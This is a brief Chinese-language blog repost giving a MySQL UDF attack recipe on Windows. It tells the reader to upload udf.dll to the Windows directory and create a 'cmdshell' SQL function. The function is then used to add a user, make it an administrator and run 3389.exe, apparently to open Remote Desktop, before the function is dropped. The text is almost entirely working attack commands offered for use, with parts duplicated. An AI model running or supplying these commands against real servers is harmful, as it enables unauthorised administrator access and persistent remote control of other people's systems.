先马udf.dll文件上传到windows目录下
C:\Winnt\udf.dll 2000
C:\Windows\udf.dll 2003
C:\Windows\udf.dll 2003
执行的sql语句
create function cmdshell returns string soname 'udf.dll'
select cmdshell('net user user password /add');
select cmdshell('net localgroup administrators user /add');
select cmdshell('e:\\3389.exe');
drop function cmdshell; 删除函数
select cmdshell('net user user password /add');
select cmdshell('net localgroup administrators user /add');
select cmdshell('e:\\3389.exe');
drop function cmdshell; 删除函数
附件:http://down.51cto.com/data/2349674
本文转自 simeon2005 51CTO博客,原文链接:http://blog.51cto.com/simeon/69821